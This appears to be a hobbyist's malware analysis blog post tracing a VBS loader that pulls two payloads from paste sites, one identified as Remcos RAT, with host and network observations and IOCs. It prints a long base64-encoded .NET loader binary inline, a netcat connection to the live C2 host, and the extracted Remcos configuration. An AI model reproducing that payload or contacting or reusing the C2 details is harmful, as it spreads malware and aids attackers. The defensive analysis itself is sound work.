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
which decoded from base64 looks to be a binary file (the hash for this file was not found on VT).
A quick look at this file saved from CyberChef with strings was interesting but not fruitful per se. The output showed that there were references to both ‘Maracaibo’ and ‘MsqBIbY’, but nothing else really. This told me that I would have to take a look at this file in dnSpy to see what was really going on.
Moving further down on the script where the other URL is located – it looked to be some API calls that I have not seen before (or at least that I can remember), in particular ‘[system.AppDomain]::CurrentDomain.Load’, ‘GetType’, ‘GetMethod’, and ‘Invoke’. A quick Google of ‘[system.AppDomain]::CurrentDomain.Load’ I was able to find this Microsoft page giving some insight into what the API calls where doing in the script. The crux of this looked to be loading and running some code in memory.
I also come across some other links from Fortinet back in 2021 that went over what looks to be a similar tatic for some malspam that delivered Agent Tesla back then.
- https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant
- https://www.avfirewalls.com/60359/breaking-new-phishing-malware-targets-bitcoin-addresses-heres-how-you-can-prevent-it
Fortinet discussed the code above being leveraged for process hallowing which makes sense considering the different API calls being made. It made even more sense since one of the alerts from the initial VB script was for a process injection using ‘Regsvcs.exe’.
So now knowing that there is some level of memory shenanigans going on here, it was time to see what goodies the other URL (hxxps://paste[.]ee/d/WRBwK/0) had.
Using curl for the URL the hxxps://paste[.]ee/d/WRBwK/0 URL gave me back the following:
which then I promptly put into CyberChef. CyberChef decided not to give me back anything useful and the issues that I had with recipe was flawed. Thankfully @kaspertame threw me a life line and helped correct my mis-step. The issues here were because:
- I had left ‘remove null bytes’ in my CyberChef recipe
- I didn’t realize that I needed to use ‘reverse’ within CyberChef to format the data correctly
- Granted there was nothing in the script that would allude one to use the reverse recipe. More on this here in a bit.
Once I got things figured out in CyberChef, I was able to download the binary and cross check the hash on VT to see if it was a known hash – which it definitely was.
I also did the same thing that I did with the other one and used strings to see what I could gather quickly from that output. Pretty quickly the strings output gave up some great details – especially the fact that someone was really proud of this being Remcos.
Doing a couple of quick grep searches with strings was pretty interesting as well.
- strings paste.ee.exe | grep "^\[.*" [End of clipboard] [Ctrl+V] [Text pasted from clipboard] [Ctrl+ [AltL] [AltR] [CtrlL] [CtrlR] [End of clipboard] [Text copied to clipboard] [Chrome StoredLogins not found] [Chrome StoredLogins found, cleared!] [Chrome Cookies not found] [Chrome Cookies found, cleared!] [Firefox StoredLogins not found] [Firefox StoredLogins Cleared!] [Firefox Cookies not found] [Firefox cookies found, cleared!] [IE cookies not found] [IE cookies cleared!] [Cleared browsers logins and cookies.] - strings paste.ee.exe | grep "AppData.*" \AppData\Local\Google\Chrome\User Data\Default\Login Data \AppData\Local\Google\Chrome\User Data\Default\Cookies \AppData\Roaming\Mozilla\Firefox\Profiles\
File Analysis
===========
Switching gears, I moved the two files that I was able to pull down from the two URLs seen in the script on to my VM. Opening the first file from the pasteio.com site using dnSPy and looking for ‘Maracaibo.Class1’ and the method ‘MsqBIbY’ gave all kinds of great information. Information that I could make educated assumptions about (ie: seeing the code for what I can only assume is the reverse function for the second URL as seen below, hence why it was not included in the script), but nothing that I could really dig further into due to the lack of skills here.
As a side note: @IzzyBoopFPV pointed out to me when we were talking about this, “das sum sussy baka shit right there [sic]”.
With the other binary downloaded from the paste.ee URL, I did not see anything there unfortunately within dnSpy. I did run it through Capa and got the following back from it.
Capability Namespace ========================== check for software breakpoints - anti-analysis/anti-debugging/debugger-detection self delete - anti-analysis/anti-forensic/self-deletion get geographical location - collection gather firefox profile information (2 matches) - collection/browser log keystrokes via application hook (2 matches) - collection/keylog log keystrokes via polling (3 matches) - collection/keylog capture microphone audio (4 matches) - collection/microphone capture screenshot - collection/screenshot receive data (7 matches) - communication send data (2 matches) - communication create reverse shell - communication/c2/shell execute shell command and capture output - communication/c2/shell resolve DNS - communication/dns create two anonymous pipes - communication/named-pipe/create initialize Winsock library - communication/socket encode data using Base64 - data-manipulation/encoding/base64 encode data using XOR (16 matches) - data-manipulation/encoding/xor encrypt data using AES (3 matches) - data-manipulation/encryption/aes reference AES constants - data-manipulation/encryption/aes encrypt data using OpenSSL ECDSA - data-manipulation/encryption/ecdsa encrypt data using RC4 KSA - data-manipulation/encryption/rc4 encrypt data using RC4 PRGA - data-manipulation/encryption/rc4 hash data using SHA256 (2 matches) - data-manipulation/hashing/sha256 authenticate HMAC - data-manipulation/hmac generate random numbers via WinAPI - data-manipulation/prng contain a thread local storage (.tls) section - executable/pe/section/tls extract resource via kernel32 functions - executable/resource read clipboard data (5 matches) - host-interaction/clipboard write clipboard data (2 matches) - host-interaction/clipboard query environment variable - host-interaction/environment-variable set environment variable (2 matches) - host-interaction/environment-variable get common file path (2 matches) - host-interaction/file-system copy file - host-interaction/file-system/copy create directory (5 matches) - host-interaction/file-system/create delete directory (3 matches) - host-interaction/file-system/delete delete file (15 matches) - host-interaction/file-system/delete check if file exists (16 matches) - host-interaction/file-system/exists enumerate files recursively (3 matches) - host-interaction/file-system/files/list get file attributes (2 matches) - host-interaction/file-system/meta set file attributes (10 matches) - host-interaction/file-system/meta move file (2 matches) - host-interaction/file-system/move read file on Windows (4 matches) - host-interaction/file-system/read read file via mapping - host-interaction/file-system/read write file on Windows (6 matches) - host-interaction/file-system/write enumerate gui resources - host-interaction/gui change the wallpaper - host-interaction/gui/session get graphical window text (4 matches) - host-interaction/gui/window/get-text hide graphical window (7 matches) - host-interaction/gui/window/hide get keyboard layout (2 matches) - host-interaction/hardware/keyboard enumerate disk volumes - host-interaction/hardware/storage get disk information (3 matches) - host-interaction/hardware/storage check mutex - host-interaction/mutex check mutex and exit (3 matches) - host-interaction/mutex shutdown system (2 matches) - host-interaction/os get system information on Windows - host-interaction/os/info create process on Windows (16 matches) - host-interaction/process/create use process replacement - host-interaction/process/inject enumerate processes (2 matches) - host-interaction/process/list modify access privileges - host-interaction/process/modify terminate process (14 matches) - host-interaction/process/terminate query or enumerate registry key (2 matches) - host-interaction/registry query or enumerate registry value (7 matches) - host-interaction/registry set registry value (7 matches) - host-interaction/registry/create delete registry key (2 matches) - host-interaction/registry/delete delete registry value - host-interaction/registry/delete continue service - host-interaction/service pause service - host-interaction/service query service status - host-interaction/service enumerate services - host-interaction/service/list modify service - host-interaction/service/modify start service (2 matches) - host-interaction/service/start stop service (2 matches) - host-interaction/service/stop get session user name - host-interaction/session get installed programs - host-interaction/software create thread (22 matches) - host-interaction/thread/create terminate thread (2 matches) - host-interaction/thread/terminate bypass UAC via ICMLuaUtil - host-interaction/uac/bypass link many functions at runtime (2 matches) - linking/runtime-linking linked against CPP standard library - linking/static enumerate PE sections - load-code/pe parse PE header (2 matches) - load-code/pe resolve function by parsing PE exports (6 matches) - load-code/pe persist via Run registry key (4 matches) - persistence/registry/run
I exported these files and have included them in the Github repo for this investigation for anyone that wants to take a crack at them.
Host Analysis
=============
Now that the files have been obtained and I have a good idea of what is going on via the script and what to look for, it was time to see what happened when actually running it in my VM and what happened at the network layer.
The first attempt was done using the script as that seemed like the path of least resistance. Unfortunately this was not the case and the script bombed out. Looking at Wireshark I could see the calls made by the script to the two URLs, but I ended up getting a reset back from the hosts (not shown here) which was the end of that.
For grins, I thought that I would look at Conversations within Wireshark to see if any “odd” ports may have been used. Nope, nada.
Next up was running the binary files themselves starting with the binary from pasteio.com. As soon as I executed the file, MS AV popped up and let me know that it had stopped the execution of something bad even though MAV was disabled for real-time scanning. Looking at ProcMon and filtering for any created or ended processes I could see that as soon as it was created it ended.
Looking at Wireshark this time gave me a small surprise – two outbound calls for the following domains not seen before:
- rds[.]accesscam[.]org / 185.174.101.214
- geoplugin.net/json.gp which returned info on the IP address seen from the VM
Taking this and cross-referencing against Sysmon logs I was able to validate that the binary from pasteio.com made the calls.
Since I didn’t get much from the pasteio.exe binary, I switched to the binary from the paste.ee domain and ran that. This time the activity within the VM was much more promising. I got the same call outs to the two domains listed above, but also a small stream of traffic to the rds[.]accesscam[.]org domain (178[.]237[.]33[.]50) on port 6620 as seen in the conversations below.
Note: As a side, the port 6620 looks to be related to tcp/kftp-data.
The only thing that I can assume on the network level is that the communication between the VM and port 6620 is dormant and nothing is really going on (almost like a heart beat) and that the VM is waiting for commands from the server. I also checked both Shodan and Censys to see if this port was seen at either place and neither had any information about this port. Granted using netcat (nc -v rdm.accesscam.org 6620) from terminal told me that I had connected successfully. So who knows.
Now considering the binary did not need to use the process hollowing technique to run on the system, the persistence mechanism was not created. When doing a quick scan of the registry and filesystem for anything modified/created by the process, the anything that I saw was the binary playing with the registry and NOTHING on on the filesystem:
Also looking at the Sysmon events again I did not see anything else that stood out with what I saw mentioned above.
The last thing that I wanted to attempt was to pull the config out of the binary since based on others (ie: Jai‘s most excellent post about this very thing which can be read here) it looked pretty easy to do. In this case it took a couple of tries (which I am still not sure how I messed up since the working one looked like the others), but I did finally manage to pull it out.
I have also cleaned up the config file a bit for ease of copy/pasta.
C2 Host: rdm.accesscam.org Port: 6620 Password: 1 Botnet: Hpp Mutex: Rmc-NAGSJO rdm.accesscam.org:6620:1|Hpp|1|1|100000||8|remcos.exe|0|Rmc-NAGSJO|0|8|logs.dat|10|5|6|Screenshots|5|MicRecords||0|0|0|1|Remcos|remcos|5722EFB615BBED358FD19DBBAECDA904
IOCs
=====
URL: hxxps://hidrive[.]ionos.com/lnk/SBBJoDne#file [VT] [URLHaus]
URL: hxxps://textbin[.]net/raw/ezjmofz3s6 – [VT] [URLHaus]
URL: hxxps://pasteio[.]com/download/xNVOEKuDyLXR [VT] [URLHaus]
URL: hxxps://paste[.]ee/d/WRBwK/0 [VT] [URLHaus]
Domain: rdm[.]accesscam[.]org:6620 [VT] [URLHaus]
URL: geoplugin[.]net/json.gp [VT] [URLHaus]
IP: 185[.]174[.]101[.]214 [VT] [URLHaus]
Scanned-2023Reports.vbs: b116f7ca8259e5ea9a53651a84d32ade6cb96c24a97f5d8f7eb6cb6e95a771f
paste.ee.exe: 288a045071388145c559b70d4fc7ff27baae2a3fda629d88a5da8e47ad9ee1ae [VT]
pasteio.com.exe: c92b586ab278e4d0390629f9039182d9d012e49605db44fb90db56951693a1be